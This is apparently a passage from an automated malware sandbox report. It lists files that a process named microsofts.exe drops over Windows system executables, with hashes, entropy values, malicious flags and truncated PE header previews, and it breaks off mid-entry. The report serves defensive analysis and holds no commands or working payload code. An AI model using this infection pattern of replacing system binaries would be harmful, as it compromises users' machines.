                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.(..@...@...........................................!...........................|...d....jX..............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................8./..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.|...d....jX.................................................................8.B..jX.....19041.1.amd64fre.vb_release.191206-1406.....,.@..jX................'"a.-....spp.pdb...........@..jX......T.c..i.\.C.s"8@....vssvc.pdb......./.@..jX.....W.p.D.......]....vssapi.pdb......-.@..jX......\..Q....T*&.......udfs.pdb........0.@..jX.......B..,`..9..4.....ifsutil.pdb.....-.@..jX.....I:...S%9.`...'.R....uudf.pdb........1.@..jX............1$OI"......wbengine.pdb................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1150976
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.038914273630659
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:NwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5A2927C6AC02ED9AAA0EEAD979B6927B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1643B752C9CB197A45F79CF874491B60C0C462C0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A07AAF891E3ACBE20E6A175BD505C94320F28D7324495954D441F9B2C1AFECDD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B3DD005C4045CA52E910DFC382123AEAF6814CBE68FA865AD2643714677877F036C69F0682BFE8D6171EB641C530CA1832DD1168E0E64E4813F47EBF6BF8285A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@..................................W........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\AgentService.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.974315137464885
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:kwVFr68Vw9wn/6h8N1zid1Dmg27RnWGj:kwVFrssC/d1D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9543A0B25A6C0199CB8A7CB3D1E158F8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:720CB4EBCCC85E964639B9CE175FA976D226E4A1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:26EEE7777EF60A7F140E8644E5DCA58FE4EBD9B8F59294078262F14950963917
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D56B782BA67DC55E2C1CC958E4E5C91708B11D142883F0A7504D0966EDFE3A309ADBAE73170B123AB6A84A36CDD49C65F4D16F773E3256E5DCBBEF3C99ED5D58
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.....................................=.... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.25374917200631
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:GQW4qoNUgslKNX0Ip0MgHCpoMBOuYsqjnhMgeiCl7G0nehbGZpbD:GQW9BKNX0IPgiKMBOuEDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C44491674DD9A23CD4DB0BCF383E02D9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC7943DAA7E68592402C39E091F14219CC40EC36
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E140956BE9C7056E9D96331575A84255C8AF4E8227E47FB6F4B97421105F0767
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D36B6AFA1BACB991A6B1E49FA25D9AE3582A652D7BF5EAB601C5CB79DAE4872167D1C42DE0DB2E580CA3DF8974B684622FBEC27D3339978607D67609CFB228C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................W-.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163565763264593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:i2G7AbHjkHsqjnhMgeiCl7G0nehbGZpbD:i2G7AbHjGDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:680F1351195518F3B0D09606B045D041
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:05E9A8DF5B04EAD8CA2BDD472820AD2DD1315923
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2FC76537662A0D86B7218DF7F7709C864516085478453617964FD03FECA216A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D87D18A58421DFCC777F618822CC1FB9D057862BC8A068B2E5B213E11D78EA91257F725D545B22F49382963675BB22E2A01689C000C1C936855F857A4BA92277
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................s..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.288944686032053
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:OkdpSI+K3S/GWei+qNv2uG3/sqjnhMgeiCl7G0nehbGZpbD:O6SIGGWei2uG3jDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7FF4977D46F3519BDDBBC7F980695D96
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D65C09D36FEF3D7C62815F2A59168DDFC6A7097
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0DEFB3B7C8340FE786009B64C5977673A58EC0E06F2D0301E742F377A629558F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A29911E2E37A8F4E9D0BDF6CFBA0A6315480D03A0B7833E757D90CDF54B1BFD6EFF89291B4AF5135DB87D4FC70E557EF9766F0082C905413F5875134426658D7
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......x..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.017519261901143
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:58Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:58sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9A657A7F089C2AF389D25AD39498587D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC61291C6F4CF08EE620D7331F69366AD0897FBC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:89A50CD265906BF61F8363C2822AEAA03118B5A16B2FB52D5F458F95266AC2DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1727BB908171E8896939D6E1BA3A6F6E9B9FFA18454CAEBCDACF4305814B6930C6C61F51A70FD0068ABF0EF98510CCEE50F023FFA8B66F9609BD4FF280617F71
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3220327919279378
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:5xacl8ta/k/uMclF6vMclFq5zzT1p/z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GAE:ecl80kqF69Fq5zzR66CzE5Z2+fqjFpcn
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:129C9AA39107A756F033B14CD78B0D9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE2B37B08A7FFEDAC9E45C3DB053FA82508ACBD7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:55B22BEDE57A44B9A60C820D2A965461C931AC044B54F50CB419C62CC049DBC0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E47763BD6F889BFF98B8007FC91C173044894B453A2D72239266415EE5CF43EF25673997E24A5300EE95A8BBA24992A9497E0E0EB8F5B27AC0B2032864FBAAE9
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.@..X...X.......................................X...!...........................t...T...["...............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............b././..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.t...T...["..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.222908872047872
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:aObHA4LWOsvAYFTXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:LjL3UTXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E3FDD9F1AB11BF5FA018CD72E8AF127F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:669EA5E3FE9060586BC4C5667219F5560AA39D79
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB85E85398EC4C58536A6A000014ECFE39A6481AB649E4B854254EA7E61E898D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:85E736605AF5773DBE7103D1079FFDD513C269BB1298287D1C4956D1EBFD86DF9EC06027CAD683FED597B290CFBD1AAAD32A9CBE034878E7DAFA81B511745147
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@....................................o..... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1235968
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.182202025576679
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:QpFtQOjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jOjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1956F0F6BD74F7EF4C9CB4215174395
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:905BEE1B5BB4018F3067148BE70C2D802114A9D4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF2B411DB96A640B889258A83D3C613EA7D9BF61BA3C3EA7D0CF3CCF772607DD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F99414E61456D855CA702F1DE94274C5D975635EA7E817F65C474EC05B4F51AE669A13047B9E49762A86AF4FAEEDF8BCA3E30004B8FA3BA977BDFBD93D31766D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.......................................... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.102372136691769
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:l3frCoQItLsiLPLe24CxruW4bIhllXsqjnhMgeiCl7G0nehbGZpbD:l3fzsIPLkCNuVbIhDrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FE74DE3CB21B1302D776ED38CBE51157
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0BBB802156925DF99835E39FF55B6A7089AFA742
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A94691CFCDE4229BE53571C021A0669FD7D6EE56023542CD8CC6F0080BE9DD72
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AD82C9EE4552FE47A8203750013CF3468F5B9CDE2CAE51ABA2B66868B1B64276DEADEDA9DCBFD915BA2A618DA69DC1057307A18050EB641DF433D9BAD94F9FBA
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@....................................E^.... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1846784
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.939441871408274
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:wW6BApg2YuyuNDYTabvcRvNYf8km1SsqjnhMgeiCl7G0nehbGZpbD:wF2YuHNETovcvNYf8kmcDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:49C1710C0BFB918B23DDE91B5109B005
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C4231CB32518B15EC9EB2F1260B167DB0B6475DB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F28CC7097B41B55243759823A64666A59DE69D28418BF274E77C0E2C384A6E6D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AAA930AB433D6962C64A23B332F00C647D0866516893F22E353DDAEAFC6B8F012FA9BB0BFB88A23204A2182FD8EA1D0C1FC31F0B278CD3059191A64D5D194E67
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......h.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\Spectrum.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.23887290593797
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:YiW6ZvAKF5i/dN9Bdexj9Trk+FjsqjnhMgeiCl7G0nehbGZpbD:YYxF50b9Bdm9Tx9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5C7A9FB953BDB52056F816EFDBDB2113
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:35AF1353C7D1FE23FE9DE07421EEC9A1D38F5DC1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0ED59CD2CCEB31EB0DDF9A29B96805798AF6C1059B261AF9FB3D0ACAF9F28DFF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E06ABE7EB7D954AF448573FBCEDF5B85B4536CB41C3D8C0217DA9D484553FABD325113ECEC506E9D665D7C843CB8F91D3597A19DAEF57B4BA3BF2C1103E861D0
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................&.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47659287090325
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:MJnJ5D3WYOsqjnhMgeiCl7G0nehbGZpbD:MJnJ5DGYiDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:34A80D2A50958A3B610C920E02938885
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F26D43BB06A903C432786693480C2BEFDB285E0C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B0C642869C39DE1B65ED50030A0BA80DEFA3389B1079540BE71AF0EDA7AE0805
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:37C8D5A36A4443FA00979BB181ECD9A092E319DFAE08C8FE7555EBEBD2C6B1242C9B6D1DD5748DEC0BD738DA3A0EB43E117F6CF01E70716F9BA78FB0B01B3CDE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2075136
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.736567241660819
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:ZPK86JYTerDjfJ2313e1mP1MdnUZDmg27RnWGj:bD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5A1E00A57581E13BC2A44A504261CCFF
